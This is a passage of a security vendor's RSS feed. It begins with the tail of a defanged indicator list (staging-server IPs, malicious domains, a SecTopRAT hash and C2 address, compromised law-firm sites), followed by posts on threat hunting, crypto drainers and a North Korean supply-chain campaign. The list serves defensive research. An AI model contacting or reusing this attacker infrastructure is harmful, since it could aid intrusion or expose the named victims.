91[.]193[.]19[.]163
91[.]193[.]19[.]188
91[.]193[.]19[.]190
98[.]142[.]240[.]165
98[.]142[.]240[.]188
98[.]142[.]240[.]214
98[.]142[.]240[.]221
98[.]142[.]240[.]246
98[.]142[.]251[.]26
98[.]142[.]251[.]32
98[.]142[.]251[.]42
98[.]142[.]251[.]53
185[.]33[.]84[.]131
185[.]33[.]84[.]153
185[.]33[.]84[.]169
185[.]33[.]85[.]20
185[.]33[.]85[.]26
185[.]33[.]85[.]33
185[.]33[.]85[.]38
185[.]33[.]85[.]52
185[.]33[.]86[.]37
193[.]42[.]38[.]11
193[.]42[.]38[.]79
193[.]42[.]38[.]85
193[.]42[.]38[.]86
193[.]111[.]208[.]2
193[.]111[.]208[.]17
193[.]111[.]208[.]19
193[.]111[.]208[.]23
193[.]111[.]208[.]24
193[.]111[.]208[.]46
193[.]111[.]208[.]75
193[.]111[.]208[.]97
193[.]111[.]208[.]100

Additional IP Addresses Likely Linked to “Type 1” Staging Infrastructure:
23[.]140[.]40[.]66
45[.]153[.]191[.]245
46[.]29[.]163[.]28
89[.]169[.]12[.]48
89[.]253[.]222[.]25
89[.]253[.]222[.]156
95[.]182[.]123[.]86
185[.]231[.]245[.]158
217[.]114[.]15[.]253

“Type 2” Staging Server IP Addresses:
45[.]61[.]134[.]76
77[.]83[.]199[.]162
79[.]141[.]162[.]135
79[.]141[.]163[.]169
91[.]193[.]19[.]220
144[.]172[.]115[.]211
172[.]86[.]90[.]84
185[.]33[.]86[.]11
185[.]80[.]53[.]79
194[.]15[.]216[.]118

“Type 2” Staging Server Domains:
filmlerzltyazilimsx[.]shop
foolowme[.]com
joiner[.]best
lowi1[.]com
morniksell[.]com
persistancejs[.]store
pomofight[.]com
port4loms[.]com
signaturepl[.]com
yungask[.]com

Domains Linked to oreshnik[@]mailum[.]com:
108zhao[.]shop
1sou[.]top
6hms[.]top
789pettoys[.]shop
7serv[.]top
99wc[.]top
abocamuseum[.]icu
actionmovies[.]top
alcmz[.]top
alhasba[.]com
amxdh1[.]icu
anoteryo[.]top
arearugs[.]top
as5yo[.]top
ashesplayer[.]top
avodaride[.]top
azyaamode[.]shop
baihao[.]shop
baihuah[.]top
bedoueroom[.]top
bestproductreviews[.]xyz
bestrollerballpen[.]top
blogdojhow[.]com
bnpparibas[.]top
bokra[.]top
bond007[.]xyz
boxworld[.]top
bstionline[.]com
buildingjobs[.]xyz
buscavuelosbaratos[.]top
buyedmeds[.]top
buylisinopril[.]top
celebrex[.]top
chaojiwang[.]top
chenyiwen[.]top
chinapark[.]top
christianlouboutin2017[.]top
cialissale[.]top
cinselurunler[.]xyz
coinseasygenerator[.]top
couterfv[.]top
couturella[.]shop
covaticonstructioncorp[.]shop
cozartan[.]top
cryptohardware[.]shop
dcdh4[.]shop
dealermobil[.]top
depechemode[.]shop
directoryframework[.]top
discountmontblanc[.]top
discoveronline[.]top
doodstream[.]shop
downloadfreak[.]top
erectilehelp[.]top
filmezz[.]top
filmlerzltyazilimsx[.]shop
fjs95[.]shop
fmovies123[.]top
forging[.]top
fragzone[.]top
franquicias[.]top
fuckhdmov[.]top
gededewe[.]shop
getin[.]top
glitterygadgets[.]shop
gmartph[.]shop
gmt-a[.]shop
grandzxc[.]bet
guosong[.]top
haidao10[.]top
headtechnologies[.]xyz
healthcareplans[.]top
heim-k[.]shop
helperection[.]top
hilfe-ed[.]top
hirek[.]top
howtogetaloan[.]top
ida-ci[.]com
islighting[.]top
iwine[.]top
izone[.]digital
jerseysus[.]top
jiezishijie[.]top
jkse[.]shop
jsmakert[.]shop
k2bsc[.]top
kaestner[.]top
kamagrafr[.]icu
kanshuwang[.]top
kazumaka[.]top
kfzversicherungskosten[.]top
khusinhthaidanphuong[.]top
kingdomholding[.]top
krediteonlinevergleichen[.]top
lang3666[.]top
langwonet[.]top
layardrama21[.]top
lebensversicherungvergleich[.]top
levciavia[.]top
linhua97[.]top
linksoflondononsale[.]top
linksoflondonsale[.]top
liruo[.]top
liveskortv[.]shop
loanonline[.]top
loispaigesimenson[.]com
losartan[.]top
lovedou[.]top
lqsword[.]top
lx7v9[.]top
lycosex[.]top
machine-a-plastifier[.]com
manwithedhelp[.]top
marmocer[.]top
mbpen163[.]top
medicamentsbonmarche[.]top
meimei68[.]top
menjimmychooonline[.]top
milebox[.]shop
mindsetgrowth[.]shop
mm37[.]icu
monclerjackets[.]top
moruk[.]xyz
motocyclenews[.]top
moviefone[.]top
moviesone[.]top
movtime76[.]shop
movtime78[.]shop
musicdownloader[.]top
my-privatebanker[.]top
mybeststream[.]xyz
nackt-bilder[.]top
nana44[.]shop
newbalancesport[.]top
palcomp3[.]top
parisforrent[.]top
pasangiklan[.]top
patekphillipwatches[.]top
pielsteel[.]top
pravaix[.]top
rag382[.]top
rasin[.]shop
refanprediction[.]shop
regopramide[.]top
rnsddse[.]top
sales2016[.]top
sdnews[.]top
searchgo[.]shop
searchweb[.]top
semikeren[.]icu
simvascor[.]icu
simvascor[.]top
snapcans[.]top
sneakermall[.]top
soap2dayfree[.]top
socialsignals[.]shop
socksforrocks[.]shop
streaming-films[.]xyz
syavsp5[.]top
tdsc[.]top
techradar[.]top
tiffanyearringforwomen[.]top
todoarmarios[.]top
todocalefactores[.]top
todocarritos[.]top
travelplace[.]top
trendings[.]top
universaltechnology[.]top
uochut[.]shop
via345[.]top
villahome[.]top
viloriterso[.]icu
viptravelcentres[.]com
vog168[.]top
wandan[.]top
wap9[.]top
warpdrive[.]top
watchesbest[.]top
wavob[.]top
wdwnp[.]top
xelesex[.]top
ydh7[.]shop
yntz6[.]shop
yourcialsupply[.]top
youtubevideo[.]top
yxta[.]top
yybvf[.]top
zaheirx[.]shop
zakachka[.]top
zerolendnow[.]top
zt45gg[.]top

Compromised Law Firm Websites:
bianchilawgroup[.]com
brattonlawgroup[.]com
brighterdaylaw[.]com
defensegroup[.]com
dwicriminallawcenter[.]com
fisherstonelaw[.]com
jarrettfirm[.]com
raineyandrainey[.]com
rbbfirm[.]com
rmvlawyer[.]com
www[.]brentadams[.]com
www[.]cfblaw[.]com
www[.]gerlinglaw[.]com
www[.]immigration-defense[.]com
www[.]schwartzandschwartz[.]com

Sectop RAT Hash:
59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78

SecTopRAT C2 IP Address:
85[.]158[.]110[.]179[:]15847

Other Hashes:
5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428

Email Address Linked to GrayCharlie:
oreshnik[@]mailum[.]com
</code></pre>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_187b8e348054a7063fd37aec148dfc3337efc5d14.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Network Intelligence: Your Questions, Global Answers]]></title>
            <link>https://www.recordedfuture.com/ko/blog/network-intelligence-questions-answered</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/network-intelligence-questions-answered</guid>
            <pubDate>Mon, 16 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how network intelligence gives security teams control over threat investigation with global visibility—no more drowning in generic, passive threat feeds.]]></description>
            <content:encoded><![CDATA[
        <h2>The Problem with Pre-Packaged Intelligence</h2>
        <p>Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.</p>
        <p>The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.</p>
        <p>Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you can investigate what matters to your organization using your own selectors, questions, and mission requirements.</p>
        <h2>What Network Intelligence Actually Means</h2>
        <p>Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while better maintaining ethical boundaries and data minimization standards.</p>
        <p>At Recorded Future, our network intelligence capabilities provide this access to such global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to analyze adversary infrastructure at national scale.</p>
        <h2>What This Means in Practice</h2>
        <p>Consider what changes when your security operations can query global network intelligence.</p>
        <p><strong>Faster SOC Triage</strong></p>
        <p>Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.</p>
        <p><strong>Targeted or Opportunistic? Now You'll Know</strong></p>
        <p>When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.</p>
        <p><strong>Fraud Infrastructure Exposed</strong></p>
        <p>Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.</p>
        <p><strong>Attribution That Actually Holds Up</strong></p>
        <p>Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.</p>
        <h2>Integration Into Security Workflows</h2>
        <p>Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.</p>
        <h2>When Expertise Becomes Essential</h2>
        <p>For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.</p>
        <p>Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.</p>
        <h2>The Compliance Framework That Enables Trust</h2>
        <p>Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy and surveillance, profiling of individuals, or political targeting is prohibited. Access is invitation-only, requiring vetting and agreement to specific terms of use.</p>
        <p>These aren't just policies but foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while promoting appropriate boundaries.</p>
        <h2>Moving Forward</h2>
        <p>The gap between what most security programs need and what traditional threat intelligence provides continues to widen. Adversaries operate at scale, evolving infrastructure faster than feeds can update. Internal telemetry shows only what touches your perimeter. Point-in-time observations lack the context to distinguish targeted attacks from noise.</p>
        <p>Network intelligence addresses this gap with the ability to query global visibility using your own selectors. At Recorded Future, we've developed capabilities that operate at this scale, with the compliance framework and operational expertise to make them effective. For organizations ready to move beyond pre-packaged feeds, we're offering these capabilities to select customers through an invitation-only program.</p>
        <p>What matters now is recognizing that your questions matter more than their answers and building security programs that reflect that reality.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_188ef07891988f2f97aad055a1f5a7c089fb55765.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[State of Security Report | Recorded Future]]></title>
            <link>https://www.recordedfuture.com/ko/research/state-of-security</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/state-of-security</guid>
            <pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Download Recorded Future's 2026 State of Security report which provides comprehensive threat intelligence on geopolitical fragmentation, state-sponsored operations, ransomware evolution, and emerging technology risk.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Fragmentation is the new normal</h2>
              <p>The global threat landscape didn't simplify in 2025—it shattered. Geopolitical alliances strained. Criminal enterprises splintered and regrouped. State-sponsored actors shifted from dramatic disruptions to quiet pre-positioning. And as long-established norms unwound, convergence across once-distinct domains created unprecedented uncertainty.</p>
              <p>The 2026 State of Security report delivers Insikt Group's most comprehensive annual analysis of the forces shaping global security—helping leaders reduce surprise, prioritize effectively, and act with confidence.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_188a8fbb5001e358d9837adb14d5fb0897434527c.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Fragmentation Defined 2025's Threat Landscape. Here's What It Means for 2026]]></title>
            <link>https://www.recordedfuture.com/ko/blog/fragmentation-in-2025-what-it-means-for-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/fragmentation-in-2025-what-it-means-for-2026</guid>
            <pubDate>Thu, 12 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[The global threat landscape didn't simplify in 2025 — it shattered. The 2026 State of Security report represents Insikt Group's most comprehensive threat intelligence analysis to date, drawing on proprietary intelligence, network telemetry, and deep geopolitical research to help you stay ahead of converging threats.]]></description>
            <content:encoded><![CDATA[
        <p>Uncertainty has become the operating environment for business. And this year, fragmentation is driving it.</p>
        <p>The global threat landscape didn't simplify in 2025; it shattered. Geopolitical alliances strained. Criminal enterprises splintered under law enforcement pressure, then regrouped into smaller, faster, and harder-to-track operations. State-sponsored cyber actors shifted from dramatic disruptions to quiet pre-positioning, embedding themselves in networks and waiting. Hacktivist groups and influence networks amplified conflicts, blurring the line between genuine intrusions and perception warfare.</p>
        <p>But here's what makes this moment dangerous: as long-established norms unwind, fragmentation is paradoxically enabling greater interoperability across domains that were once distinct. State objectives, criminal capability, and private-sector technology increasingly reinforce one another. That convergence creates uncertainty, compresses warning time, and expands plausible deniability.</p>
        <p>Today, Recorded Future's Insikt Group releases the <strong><a href="https://www.recordedfuture.com/ko/research/state-of-security">2026 State of Security</a></strong> report, our most comprehensive annual analysis of the forces shaping global security.</p>
        <p>Drawing on proprietary intelligence, network telemetry, and deep geopolitical analysis, this report examines how 2025's fractures are reshaping the threat environment — and what security leaders must prepare for in the year ahead.</p>
        <h2>The End of Stability as a Baseline Assumption</h2>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_10c922a3a2103e396f22a400e3135d81ce6b0f02b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1220" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>2025 redefined international relations (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_14120f6481cb46917d75b8ece722dda331953c861.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[From 27 Steps to 5: How Recorded Future Reimagined Threat Hunting with Autonomous Threat Operations]]></title>
            <link>https://www.recordedfuture.com/ko/blog/threat-hunting-27-steps-to-5</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/threat-hunting-27-steps-to-5</guid>
            <pubDate>Wed, 11 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how Autonomous Threat Operations reduces 27 manual steps to as few as 5 largely automated ones, delivering the speed, scale, and effectiveness that the modern threat landscape demands.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>The manual operations gap can be a business risk</li>
                <li>Manual threat hunting requires 27 steps that burn analyst time</li>
                <li>Autonomous Threat Operations can reduce 27 steps to 5</li>
                <li>Autonomous operations prove measurable ROI</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1d6aff1dc009c244e9b6f66a1f1fe7bd44e4b681f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Rublevka Team: Anatomy of a Russian Crypto Drainer Operation]]></title>
            <link>https://www.recordedfuture.com/ko/research/rublevka-team-anatomy-russian-crypto-drainer-operation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/rublevka-team-anatomy-russian-crypto-drainer-operation</guid>
            <pubDate>Wed, 04 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Rublevka Team exemplifies the industrialization of crypto scams. Learn how traffer teams and wallet drainers enable high-volume theft.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group has identified a major cybercriminal operation specializing in large-scale cryptocurrency theft, operating under the moniker “Rublevka Team”. Since its inception in 2023, the threat group has generated over $10 million through affiliate-driven wallet draining campaigns. Rublevka Team is an example of a “traffer team,” composed of a network of thousands of social engineering specialists tasked with directing victim traffic to malicious pages. Unlike traditional malware-based approaches such as those used by the traffer teams Marko Polo and CrazyEvil (previously identified by Insikt Group, both of which distributed infostealer malware), Rublevka Team deploys custom JavaScript scripts via spoofed landing pages that impersonate legitimate crypto services, tricking victims into connecting their wallets and authorizing fraudulent transactions. Their infrastructure is fully automated and scalable, offering affiliates access to Telegram bots, landing page generators, evasion features, and support for over 90 wallet types. By lowering the technical barrier to entry, Rublevka Team has built an extensive ecosystem of global affiliates capable of launching high-volume scams with minimal oversight.</p>
        <p>This structure poses a growing threat to cryptocurrency platforms, fintech providers, and brands whose identities are being impersonated. Organizations that facilitate blockchain transactions, particularly fintech firms, exchanges, or wallet providers, face elevated reputational and legal risks if customers fall victim to these scams. Even if the victim’s compromise occurs outside a firm’s platform, failure to detect spoofed landing pages or fraudulent referrals can trigger consumer backlash, loss of trust, or regulatory scrutiny around customer protections and Know Your Customer (KYC) enforcement. The threat group’s agility — evidenced by its use of frequently rotating domains, targeting lower-cost chains like Solana (SOL), and exploiting Remote Procedure Call (RPC) APIs — undermines traditional fraud detection and domain takedown efforts. Their model mirrors ransomware-as-a-service (RaaS) operations, signaling a continuation of the broader shift toward scalable, service-based cybercrime that organizations must proactively monitor, disrupt, and defend against to protect customers and maintain trust.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The objective of a Rublevka Team scam is to create an attractive SOL-based offer, such as a promotion or an airdrop event, generate traffic to the lure via social media or advertisements, and trick a user into connecting their wallet to the website and signing a transaction that drains their wallet.</li>
          <li>As of writing, Rublevka Team’s primary Telegram channel has approximately 7,000 members. Over 240,000 messages have been posted to Rublevka Team’s automated “profits” channel, indicating at least 240,000 successful wallet drains, with transactions ranging from $0.16 to over $20,000.</li>
          <li>Rublevka Team offers a custom JavaScript drainer embedded into their landing pages, which exfiltrates victims’ SOL assets by draining held tokens. The drainer is compatible with over 90 SOL wallet types.</li>
          <li>The threat group’s infrastructure is fully automated via Telegram bots, offering affiliates tools for landing page creation, campaign tracking, cloaking, and distributed denial-of-service (DDoS) protection.</li>
          <li>The drainer campaign, active since 2023, leverages spoofed versions of legitimate services such as Phantom, Bitget, and Jito to maximize user trust and conversion</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1f21796732ee17098dc9eae5148e093dc47d7f9de.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team | Recorded Future]]></title>
            <link>https://www.recordedfuture.com/ko/blog/autonomous-threat-operations-in-action</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/autonomous-threat-operations-in-action</guid>
            <pubDate>Sun, 01 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article explores how Recorded Future served as Customer Zero for Autonomous Threat Operations, testing the new solution within our own SOC to validate its real-world impact before releasing it to the public. The article reveals how the technology transformed inconsistent, analyst-dependent threat hunting into unified, automated operations—enabling junior analysts to run 15–20 hunts weekly and allowing our CISO to launch comprehensive network hunts in five minutes in response to critical threats like Salt Typhoon. By understanding these outcomes, security leaders can see how autonomous threat hunting empowers teams at every skill level to shift from reactive to proactive defense.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li>Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.</li>
          <li>Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.</li>
          <li>Team members now run 15-20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.</li>
          <li>During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.</li>
          <li>A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.</li>
        </ul>
        <h2>Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team</h2>
        <p>The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.</p>
        <p>That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.</p>
        <p>The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.</p>
        <h2><strong>The challenge: Inconsistent and analyst-dependent threat hunting</strong></h2>
        <p>Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."</p>
        <div>
          <div>
            <div>c4yy0f6y1p</div>
          </div>
        </div>
        <p>This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.</p>
        <h2><strong>The transformation: Unified, repeatable threat hunting</strong></h2>
        <p>Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."</p>
        <p>The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."</p>
        <p>Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."</p>
        <h2><strong>Real-world impact: Upskilling junior analysts and enabling rapid response</strong></h2>
        <p>According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.</p>
        <p>First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.</p>
        <p>Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.</p>
        <div>
          <div>
            <div>sn9crhxmaj</div>
          </div>
        </div>
        <p>Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background,” he says. “We get our results, and then they can do research in the app to shore up the findings."</p>
        <p>Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.</p>
        <p>That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.</p>
        <h2><strong>The advantage of a single pane of glass</strong></h2>
        <p>Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."</p>
        <p>This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.</p>
        <h2><strong>Why the Customer Zero experience matters</strong></h2>
        <p>Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.</p>
        <p>Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."</p>
        <p>We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.</p>
        <p><strong>Learn more about Autonomous Threat Operations by clicking</strong> <strong><a href="https://www.recordedfuture.com/ko/products/autonomous-threat-operations">here</a>, or start operationalizing your threat intelligence now by booking a</strong> <strong><a href="https://go.recordedfuture.com/ato-demo.html?__utma=150831654.1091255729.1769524153.1769524153.1769524153.1&amp;__utmb=150831654.0.10.1769524153&amp;__utmc=150831654&amp;__utmx=-&amp;__utmz=150831654.1769524153.1.1.utmcsr=(direct)%7Cutmccn=(direct)%7Cutmcmd=(none)&amp;__utmv=-&amp;__utmk=14649591">custom demo</a>.</strong></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1a3ded09023847b846727759f0086351655ddf92a.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[PurpleBravo’s Targeting of the IT Software Supply Chain]]></title>
            <link>https://www.recordedfuture.com/ko/research/purplebravos-targeting-it-software-supply-chain</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/purplebravos-targeting-it-software-supply-chain</guid>
            <pubDate>Wed, 21 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how PurpleBravo, a North Korean threat group, exploits fake job offers to target software supply chains, using RATs and infostealers like BeaverTail.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>PurpleBravo is a North Korean state-sponsored threat group that overlaps with the “Contagious Interview” campaign first documented in November 2023. It targets software developers, especially in the software development and cryptocurrency verticals, via fake recruiter outreach, interview coding tests, and ClickFix prompts. Activity throughout 2025 has linked multiple fraudulent LinkedIn personas to PurpleBravo through malicious GitHub repositories and fictitious lure brands. The group’s tool set includes BeaverTail (a JavaScript infostealer and loader) and multi-platform remote access trojans (RATs), specifically, PyLangGhost and GolangGhost, optimized for stealing browser credentials and cryptocurrency wallet information.</p>
        <p>Based on Recorded Future® Network Intelligence, Insikt Group identified 3,136 individual IP addresses concentrated in South Asia and North America linked to likely targets of PurpleBravo activity from August 2024 to September 2025. Twenty potential victim organizations were observed across the AI, cryptocurrency, financial services, IT services, marketing, and software development verticals in Europe, South Asia, the Middle East, and Central America. In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target. Insikt Group observed PurpleBravo administering command-and-control (C2) servers via Astrill VPN and from IP ranges in China, with BeaverTail and GolangGhost C2 servers hosted across seventeen distinct providers.</p>
        <p>Insikt Group distinguishes PurpleBravo (Contagious Interview) from PurpleDelta (North Korean IT workers) but has documented meaningful intersections. This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity.</p>
        <p>PurpleBravo presents an overlooked threat to the IT software supply chain. Because many targets are in the IT services and staff-augmentation industries with large public customer bases, compromises can propagate downstream to their customers. This campaign poses an acute software supply-chain risk to organizations that outsource development, particularly in regions where PurpleBravo concentrates its fictitious recruitment efforts.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>PurpleBravo employs a combination of fictitious personas, organizations, and websites to distribute malware to unsuspecting job seekers in the software development industry. Candidates sometimes use their corporate devices, thereby compromising their employers' security.</li>
          <li>PurpleBravo uses a variety of custom and open-source malware and tools in its operations, including BeaverTail, InvisibleFerret, GolangGhost, and PylangGhost.</li>
          <li>Using Recorded Future Network Intelligence, Insikt Group identified 3,136 individual IP addresses linked to likely targets of PurpleBravo activity and twenty potential victim organizations in the AI, cryptocurrency, financial services, IT services, marketing, and software development industries.</li>
          <li>Insikt Group has observed multiple points of overlap between PurpleBravo and PurpleDelta, Recorded Future’s designation for North Korean IT workers, indicating that some individuals may be active in both operations.</li>
